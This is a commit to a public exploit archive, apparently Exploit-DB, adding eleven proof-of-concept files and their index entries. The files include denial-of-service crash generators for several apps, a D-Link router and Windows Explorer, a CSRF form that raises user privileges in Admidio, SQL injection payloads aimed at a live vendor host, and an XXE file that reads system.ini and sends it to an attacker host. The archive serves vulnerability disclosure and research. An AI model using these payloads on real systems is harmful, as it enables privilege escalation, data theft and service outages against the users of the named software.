DB: 2018-09-04

10 changes to exploits/shellcodes VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC) Visual Ping 0.8.0.0 - 'Host' Denial of Service (PoC) D-Link DIR-615 - Denial of Service (PoC) Symantec Mobile Encryption for iPhone 2.1.0 - 'Server' Denial of Service (PoC) Microsoft Windows Explorer Out-of-Bound Read - Denial of Service (PoC) Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC) Wikipedia 12.0 - Denial of Service (PoC) Argus Surveillance DVR 4.0.0.0 - Directory Traversal Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting Argus Surveillance DVR 4.0.0.0 - Directory Traversal Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting WordPress Plugin Quizlord 2.0 - Cross-Site Scripting Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting Vox TG790 ADSL Router - Cross-Site Scripting WordPress Plugin Quizlord 2.0 - Cross-Site Scripting Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting Vox TG790 ADSL Router - Cross-Site Scripting FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions) Online Quiz Maker 1.0 - 'catid' SQL Injection
2018-09-04 05:01:55 +00:00 · 2018-09-04 05:01:55 +00:00 · 925b2171f4
commit 925b2171f4
parent cab3204d2b
11 changed files with 358 additions and 6 deletions
--- a/exploits/hardware/dos/45317.txt
+++ b/exploits/hardware/dos/45317.txt
@ -0,0 +1,19 @@
+# Exploit Title: D-Link DIR-615 - Denial of Service (PoC)
+# Date: 2018-08-09
+# Vendor Homepage: http://www.dlink.co.in
+# Hardware Link:  https://www.amazon.in/D-Link-DIR-615-Wireless-N300-Router-Black/dp/B0085IATT6
+# Version: D-Link DIR-615
+# Category: Hardware
+# Exploit Author:  Aniket Dinda
+# Tested on: Linux (kali linux)
+# Web: https://hackingvila.wordpress.com/2018/08/24/d-link-dir-615-buffer-overflow-via-a-long-authorization-http-header-click-here/
+# Cve: CVE-2018-15839
+
+# Proof Of Concept:
+
+1- First connect to this network
+2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser.
+3- Goto Easy setup > 
+4- Now as the Burp is intercept is on, you will find an Authorization: Basic or cookie: SessionId followed by a string. Now we paste a string consisting oaf 5000 zeros.
+5- Then forward the connection
+6- Then your router automatically log out and the net connection will be gone.
--- a/exploits/ios/dos/45318.py
+++ b/exploits/ios/dos/45318.py
@ -0,0 +1,26 @@
+# Exploit Title: Symantec Mobile Encryption for iPhone 2.1.0 - 'Server' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-09-02
+# Vendor Homepage: https://www.symantec.com/
+# Software Link: https://itunes.apple.com/mx/app/symantec-mobile-encryption/id450235714?mt=8
+# Tested Version: 2.1.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 11.4.1
+
+# Steps to Produce the Crash:
+# 1.- Run python code: Symantec_Mobile_Encryption_2.1.0.py
+# 2.- Copy content to clipboard
+# 3.- Open App Symantec Mobile Encryption for iPhone
+# 4.- User License -> Accept
+# 5.- Instructions -> Setup
+# 6.- Paste ClipBoard on "Server"
+# 7.- User -> admin
+# 8.- Password -> admin
+# 9.- Next
+# 10.- Network Settings -> Next
+# 11.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 1907
+print (buffer)
--- a/exploits/ios/dos/45321.py
+++ b/exploits/ios/dos/45321.py
@ -0,0 +1,21 @@
+# Exploit Title: Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-09-01
+# Vendor Homepage: http://www.trendmicro.com.tr/media/ds/virtual-mobile-infrastructure-datasheet-en.pdf
+# Software Link: App Store for iOS devices
+# Tested Version: 5.5.1336
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 11.4.1
+
+# Steps to Produce the Crash:
+# 1.- Run python code: Virtual_Mobile_Infrastructure_5.5.1336.py
+# 2.- Copy content to clipboard
+# 3.- Open App Vitual Mobile Infrastructure
+# 4.- Paste ClipBoard on "Server address"
+# 5.- Next
+# 6.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 15000
+print (buffer)
--- a/exploits/php/webapps/45322.txt
+++ b/exploits/php/webapps/45322.txt
@ -0,0 +1,51 @@
+# Exploit Title: Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)
+# Author: Nawaf Alkeraithe
+# Date: 2018-09-01
+# Vendor Homepage: https://www.admidio.org/
+# Software Link: https://sourceforge.net/projects/admidio/files/Admidio/3.3.x/admidio-3.3.5.zip/download
+# Version: 3.3.5
+# Tested on: PHP
+# CVE: N/A
+
+# Description:
+# Low Privilage users are able to increase their permissions due to improper origin checking
+# by the vendor. 
+
+<html>
+<form enctype="application/x-www-form-urlencoded" method="POST" action="http://Target/adm_program/modules/roles/roles_function.php?rol_id=2&mode=2">
+	<table>
+		<tr><td>rol_name</td><td><input type="text" value="Member" name="rol_name"></td></tr>
+		<tr><td>rol_description</td><td><input type="text" value="All+organization+members" name="rol_description"></td></tr>
+		<tr><td>rol_cat_id</td><td><input type="text" value="4" name="rol_cat_id"></td></tr>
+		<tr><td>rol_mail_this_role</td><td><input type="text" value="2" name="rol_mail_this_role"></td></tr>
+		<tr><td>rol_this_list_view</td><td><input type="text" value="1" name="rol_this_list_view"></td></tr>
+		<tr><td>rol_leader_rights</td><td><input type="text" value="3" name="rol_leader_rights"></td></tr>
+		<tr><td>rol_lst_id</td><td><input type="text" value="0" name="rol_lst_id"></td></tr>
+		<tr><td>rol_default_registration</td><td><input type="text" value="1" name="rol_default_registration"></td></tr>
+		<tr><td>rol_max_members</td><td><input type="text" value="" name="rol_max_members"></td></tr>
+		<tr><td>rol_cost</td><td><input type="text" value="" name="rol_cost"></td></tr>
+		<tr><td>rol_cost_period</td><td><input type="text" value="" name="rol_cost_period"></td></tr>
+		<tr><td>rol_assign_roles</td><td><input type="text" value="1" name="rol_assign_roles"></td></tr>
+		<tr><td>rol_all_lists_view</td><td><input type="text" value="1" name="rol_all_lists_view"></td></tr>
+		<tr><td>rol_approve_users</td><td><input type="text" value="1" name="rol_approve_users"></td></tr>
+		<tr><td>rol_edit_user</td><td><input type="text" value="1" name="rol_edit_user"></td></tr>
+		<tr><td>rol_mail_to_all</td><td><input type="text" value="1" name="rol_mail_to_all"></td></tr>
+		<tr><td>rol_profile</td><td><input type="text" value="1" name="rol_profile"></td></tr>
+		<tr><td>rol_announcements</td><td><input type="text" value="1" name="rol_announcements"></td></tr>
+		<tr><td>rol_dates</td><td><input type="text" value="1" name="rol_dates"></td></tr>
+		<tr><td>rol_photo</td><td><input type="text" value="1" name="rol_photo"></td></tr>
+		<tr><td>rol_download</td><td><input type="text" value="1" name="rol_download"></td></tr>
+		<tr><td>rol_guestbook</td><td><input type="text" value="1" name="rol_guestbook"></td></tr>
+		<tr><td>rol_guestbook_comments</td><td><input type="text" value="1" name="rol_guestbook_comments"></td></tr>
+		<tr><td>rol_weblinks</td><td><input type="text" value="1" name="rol_weblinks"></td></tr>
+		<tr><td>rol_start_date</td><td><input type="text" value="" name="rol_start_date"></td></tr>
+		<tr><td>rol_end_date</td><td><input type="text" value="" name="rol_end_date"></td></tr>
+		<tr><td>rol_start_time</td><td><input type="text" value="" name="rol_start_time"></td></tr>
+		<tr><td>rol_end_time</td><td><input type="text" value="" name="rol_end_time"></td></tr>
+		<tr><td>rol_weekday</td><td><input type="text" value="" name="rol_weekday"></td></tr>
+		<tr><td>rol_location</td><td><input type="text" value="" name="rol_location"></td></tr>
+		<tr><td>btn_save</td><td><input type="text" value="" name="btn_save"></td></tr>
+	</table>
+<input type="submit">
+</form>
+</html>
--- a/exploits/php/webapps/45323.txt
+++ b/exploits/php/webapps/45323.txt
@ -0,0 +1,77 @@
+# Exploit Title: Online Quiz Maker 1.0 - 'catid' SQL Injection
+# Dork: N/A
+# Date: 2018-09-03
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://www.hscripts.com/scripts/php/quiz-maker.php
+# Software Link:https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+
+# Description : An attacker can execute SQL commands through parameters
+# that contain vulnerable.
+# An authorized user can use the filtering feature and can fully authorize
+# the database or other server informations. Also there are XSS
+# vulnerabilities too.
+
+# PoC : SQLi 1 :
+# Request(POST):
+
+POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1
+Host: www.hscripts.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://www.hscripts.com/scripts/php/quiz-system/quiz-system.php
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 18
+uname=test&catid=1
+
+# Parameter: catid (POST)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: 
+
+uname=test&catid=1 AND 4815=4815
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: 
+
+uname=test&catid=1 AND SLEEP(5)
+
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 10 columns
+# Payload: 
+
+uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x56476b436866655067774c6d786b6e434f59566c7541666363786855764c686b5949486e6a4d6b68,0x7178716271),NULL,NULL,NULL--bocR
+
+# PoC : SQLi 2: Admin Login SQL Injection
+# Request(POST):
+
+POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1
+Host: www.hscripts.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer:
+https://www.hscripts.com/scripts/php/quiz-system/admin/add-category.php
+Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 38
+usern=testing&passw=password&type=auth
+
+# Parameter: usern (POST)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: 
+
+usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth
--- a/exploits/windows/dos/45315.py
+++ b/exploits/windows/dos/45315.py
@ -0,0 +1,26 @@
+# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC)
+# Discovery by: Diego Santamaria
+# Discovery Date: 2018-08-31
+# Vendor Homepage: https:https://www.visionistech.com/en/home/
+# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
+# Tested Version: V2.6.2.70 build20171226_053
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional
+ 
+# Steps to Reproduce: 
+
+# 1. Run the python code Nickname.py 
+# 2. Open nickname_exploit.txt and copy the content 
+# 3. Open VSAXESS.exe 
+# 4. Register a password and username
+# 5. choose 'Add'
+# 6. choose 'Serial Port'
+# 6. Paste the content from nickname_exploit.txt on 'Nickname'
+# 7. Press 'Aceptar' and Crashed
+ 
+#!/usr/bin/env python
+
+content = "\x41" * 9300
+f = open ("nickname_exploit.txt", "w")
+f.write(content)
+f.close()
--- a/exploits/windows/dos/45320.py
+++ b/exploits/windows/dos/45320.py
@ -0,0 +1,45 @@
+# Exploit Title: Microsoft Windows Explorer Out-of-Bound read - Denial of Service (PoC)
+# Date: 2018-09-01
+# Exploit Author: Ghaaf
+# Vendor Homepage: http://www.microsoft.com
+# Version: Windows 7(x86/x64)
+# Tested on: 6.1.7601 Service Pack 1 Build 7601
+# CVE: N/A
+
+buffer = ''
+buffer += "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00"
+buffer += "\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00"
+buffer += "\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68"
+buffer += "\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F"
+buffer += "\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20"
+buffer += "\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88"
+buffer += "\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88"
+buffer += "\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88"
+buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x03\x00"
+buffer += "\xE8\x2D\x73\x54\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x0F\x01"
+buffer += "\x0B\x01\x06\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00"
+buffer += "\x68\x11\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00"
+buffer += "\x00\x10\x00\x00\x00\x10\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
+buffer += "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x10\x00\x00"
+buffer += "\xB2\xEA\x00\x00\x02\x00\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00"
+buffer += "\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00"
+buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x94\x1A\x00\x00\x28\x00\x00\x00"
+buffer += "\x00\x30\x00\x00\xA4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x28\x02\x00\x00\x20\x00\x00\x00"
+buffer += "\x00\x10\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x2E\x74\x65\x78\x74\x00\x00\x00\x38\x0D\x00\x00\x00\x10\x00\x00"
+buffer += "\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x64\x61\x74\x61\x00\x00\x00"
+buffer += "\xE0\x09\x00\x00\x00\x20\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00"
+buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0"
+buffer += "\x2E\x72\x73\x72\x63\x00\x00\x00\xA4\x08\x00\x00\x00\x30\x00\x00"
+buffer += "\x00\x10\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+buffer += "\x00\x00\x00\x00\x40\x00\x00\x40\x6C\xDA\x5B\x4A\x10\x00\x00\x00"
+open("poc.exe", "wb").write(buffer)
--- a/exploits/windows/dos/45324.py
+++ b/exploits/windows/dos/45324.py
@ -0,0 +1,25 @@
+# Exploit Title: Wikipedia 12.0 - Denial of Service (PoC)
+# Date: 9/2/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://www.microsoft.com/en-us/p/wikipedia/9wzdncrfhwm4?activetab=pivot%3aoverviewtab
+# Version: 12.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# Run the python script, it will create a new file "wiki.txt"
+# Copy the text from the generated wiki.txt file to clipboard
+# Paste the text in the search bar in the top right of app
+# App will now crash
+
+buffer = "A" * 1000
+payload = buffer
+try:
+    f=open("wiki.txt","w")
+    print "[+] Creating %s evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
--- a/exploits/windows/webapps/45319.txt
+++ b/exploits/windows/webapps/45319.txt
@ -0,0 +1,23 @@
+# Title: FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection
+# Author: hyp3rlinx
+# Date: 2018-09-01
+# Vendor: www.eventlogxp.com
+# Software: https://eventlogxp.com/download.php
+# Affected Component: elex.exe
+# CVE: N/A
+
+# Description:
+# Upon opening a specially crafted .ELX file in Event Log Explorer, remote attackers 
+# can potentially gain access to local files.
+
+# PoC
+python -m SimpleHTTPServer
+ 
+"test.elx"
+
+<?xml version="1.0"?>
+<!DOCTYPE gga [ 
+<!ENTITY % file SYSTEM "C:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://HACKER-IP:8000/payload.dtd">
+%dtd;]>
+<infodisclosa>&send;</infodisclosa>
--- a/exploits/windows_x86-64/dos/45316.py
+++ b/exploits/windows_x86-64/dos/45316.py
@ -0,0 +1,29 @@
+# Exploit Title: Visual Ping 0.8.0.0 - 'Host' Denial of Service (PoC)
+# Date: 2018-08-30
+# Exploit Author: Uriel Corral Salinas
+# Vendor Homepage: http://www.itlights.com
+# Software Link: http://www.scanwith.com/download/Free_Visual_Ping.htm
+# Version: Free Visual Ping  (Version 0.8.0.0)
+# Tested on: Windows 10 Pro x64
+
+# Visual Ping 0.8.0.0 - 'Host, Time Out,packet size, Pause, Loops' - Denial of Service (PoC)
+# 1. Ejecutar codigo "Visual_Ping.py"
+# 2. Copiar contenido de "VisualPing.txt" al portapapeles
+# 3. Ejecutar VPing.exe
+# 4. Copiar portapapeles en Host
+# 5. Copiar portapapeles en Time Out
+# 6. Copiar portapapeles en Packet size
+# 7. Copiar portapapeles en Pause
+# 8. Copiar portapapeles en Loops
+# 9. Click en Star
+# 10. Crashed
+
+#!/usr/bin/env python
+
+f=open("VisualPing.txt","w")
+buff = "\x41" * 4108
+ggg = "\x42" * 4
+hhh = "\x43" * 4
+iii = "\x44" * 4
+f.write(buff + ggg + hhh + iii)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6087,6 +6087,13 @@ id,file,description,date,author,type,platform,port
 45302,exploits/windows_x86-64/dos/45302.py,"NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)",2018-08-30,"Victor Mondragón",dos,windows_x86-64,
 45304,exploits/windows_x86-64/dos/45304.py,"Nord VPN 6.14.31 - Denial of Service (PoC)",2018-08-30,L0RD,dos,windows_x86-64,
 45311,exploits/windows_x86-64/dos/45311.py,"Acunetix WVS Reporter 10.0 - Denial of Service (PoC)",2018-08-31,"Ali Alipour",dos,windows_x86-64,
+45315,exploits/windows/dos/45315.py,"VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC)",2018-09-03,"Diego Santamaria",dos,windows,
+45316,exploits/windows_x86-64/dos/45316.py,"Visual Ping 0.8.0.0 - 'Host' Denial of Service (PoC)",2018-09-03,"Uriel Corral Salinas",dos,windows_x86-64,
+45317,exploits/hardware/dos/45317.txt,"D-Link DIR-615 - Denial of Service (PoC)",2018-09-03,"Aniket Dinda",dos,hardware,
+45318,exploits/ios/dos/45318.py,"Symantec Mobile Encryption for iPhone 2.1.0 - 'Server' Denial of Service (PoC)",2018-09-03,"Luis Martínez",dos,ios,
+45320,exploits/windows/dos/45320.py,"Microsoft Windows Explorer Out-of-Bound Read - Denial of Service (PoC)",2018-09-03,Ghaaf,dos,windows,
+45321,exploits/ios/dos/45321.py,"Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)",2018-09-03,"Luis Martínez",dos,ios,
+45324,exploits/windows/dos/45324.py,"Wikipedia 12.0 - Denial of Service (PoC)",2018-09-03,0xB9,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -39899,11 +39906,14 @@ id,file,description,date,author,type,platform,port
 45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80
 45284,exploits/php/webapps/45284.txt,"phpMyAdmin 4.7.x - Cross-Site Request Forgery",2018-08-29,VulnSpy,webapps,php,80
 45286,exploits/hardware/webapps/45286.py,"Episerver 7 patch 4 - XML External Entity Injection",2018-08-29,"Jonas Lejon",webapps,hardware,
-45296,exploits/windows_x86/webapps/45296.txt,"Argus Surveillance DVR 4.0.0.0 - Directory Traversal",2018-08-29,hyp3rlinx,webapps,windows_x86,
-45303,exploits/windows_x86-64/webapps/45303.txt,"Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64,
-45305,exploits/php/webapps/45305.txt,"WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php,
+45296,exploits/windows_x86/webapps/45296.txt,"Argus Surveillance DVR 4.0.0.0 - Directory Traversal",2018-08-29,hyp3rlinx,webapps,windows_x86,8080
+45303,exploits/windows_x86-64/webapps/45303.txt,"Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64,443
+45305,exploits/php/webapps/45305.txt,"WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php,80
 45306,exploits/hardware/webapps/45306.txt,"DLink DIR-601 - Credential Disclosure",2018-08-30,"Kevin Randall",webapps,hardware,
-45307,exploits/php/webapps/45307.txt,"WordPress Plugin Quizlord 2.0 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php,
-45309,exploits/windows_x86-64/webapps/45309.txt,"Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64,
-45310,exploits/hardware/webapps/45310.txt,"Vox TG790 ADSL Router - Cross-Site Scripting",2018-08-31,cakes,webapps,hardware,
+45307,exploits/php/webapps/45307.txt,"WordPress Plugin Quizlord 2.0 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php,80
+45309,exploits/windows_x86-64/webapps/45309.txt,"Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64,80
+45310,exploits/hardware/webapps/45310.txt,"Vox TG790 ADSL Router - Cross-Site Scripting",2018-08-31,cakes,webapps,hardware,443
 45314,exploits/php/webapps/45314.txt,"DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)",2018-08-31,Autism_JH,webapps,php,
+45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,
+45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80
+45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,